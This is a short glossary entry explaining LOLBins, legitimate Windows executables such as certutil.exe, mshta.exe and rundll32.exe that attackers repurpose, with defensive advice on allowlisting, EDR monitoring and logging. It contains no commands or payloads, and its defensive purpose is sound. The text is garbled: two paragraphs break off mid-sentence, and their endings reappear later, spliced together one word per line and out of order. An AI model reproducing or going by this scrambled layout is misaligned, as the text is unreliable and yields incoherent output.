Home

LOLBin

LOLBin is short for Living Off the Land Binary. It refers to legitimate, often preinstalled or signed system executables that can be repurposed by attackers to conduct malicious activity without introducing new, suspicious binaries. By using trusted tools already present on a host, adversaries can execute commands, run scripts, download payloads, or move laterally while blending in with normal system behavior. The concept highlights how security risks can arise not only from malware but also from abuse of ordinary software.

Common LOLBins include regsvr32.exe, mshta.exe, wmic.exe, certutil.exe, bitsadmin.exe, powershell.exe, wscript.exe, cscript.exe, rundll32.exe, and msbuild.exe. These tools

Detection and defense focus on identifying abnormal or unauthorized use of these binaries. This can involve

enable
a
range
of
techniques
such
as
remote
code
execution,
script
execution,
fileless
malware
deployment,
data
exfiltration,
and
credential
access.
Because
they
are
signed
and
often
trusted,
LOLBins
may
bypass
some
basic
detections
that
focus
on
nontrusted
or
suspicious
binaries,
making
their
activity
a
particular
concern
for
defenders.
enabling
application
whitelisting
or
allowlisting
to
restrict
execution
to
approved
binaries,
employing
endpoint
detection
and
response
(EDR)
capabilities
to
monitor
for
suspicious
invocation
patterns,
and
applying
strict
privilege
controls
to
limit
which
users
can
run
powerful
tools.
Additional
mitigations
include
reducing
exposure
to
network-enabled
binary
usage,
auditing
and
logging
LOLBin
activity,
segmenting
networks,
and
keeping
systems
up
to
date
with
security
patches.
Understanding
LOLBins
helps
security
teams
distinguish
legitimate
administrative
operations
from
opportunistic
abuse
during
an
intrusion.